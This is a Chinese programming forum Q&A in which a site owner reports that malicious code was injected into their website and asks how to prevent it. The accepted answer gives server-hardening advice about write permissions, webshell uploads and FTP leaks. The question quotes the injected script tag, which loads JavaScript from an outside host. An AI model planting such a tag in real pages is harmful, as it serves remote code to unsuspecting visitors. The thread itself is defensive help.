haikeshilan 2015-07-26 02:51 采纳率: 100%
浏览 2239
已采纳

网站被植入恶意代码,求解决

网站被植入恶意代码

 <script type="text/javascript" id="clientjs" src="http://mobile.dingsite.com/theapi/getjs?id=3109374&type=30"></script>

,如何防止再次被植入呢

  • 写回答

3条回答

  • Go 旅城通票 2015-07-26 05:37
    关注

    如果是虚拟空间,去提供商的管理后台关闭所有文件的写入权限,如果没有这个功能,你只能找到你网站的漏洞补上了,这个一般是被别人上传了有fso权限的木马文件,如海洋木马什么的,然后修改你的文件

    当然也不排除你的ftp权限泄露什么的。

    如果自己的服务器远程后关闭文件写入权限,打补丁,修改远程端口什么的,网上很多介绍如何配置服务器安全的文章,自己看下

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

悬赏问题

  • ¥60 版本过低apk如何修改可以兼容新的安卓系统
  • ¥25 由IPR导致的DRIVER_POWER_STATE_FAILURE蓝屏
  • ¥50 有数据,怎么建立模型求影响全要素生产率的因素
  • ¥50 有数据,怎么用matlab求全要素生产率
  • ¥15 TI的insta-spin例程
  • ¥15 完成下列问题完成下列问题
  • ¥15 C#算法问题, 不知道怎么处理这个数据的转换
  • ¥15 YoloV5 第三方库的版本对照问题
  • ¥15 请完成下列相关问题!
  • ¥15 drone 推送镜像时候 purge: true 推送完毕后没有删除对应的镜像,手动拷贝到服务器执行结果正确在样才能让指令自动执行成功删除对应镜像,如何解决?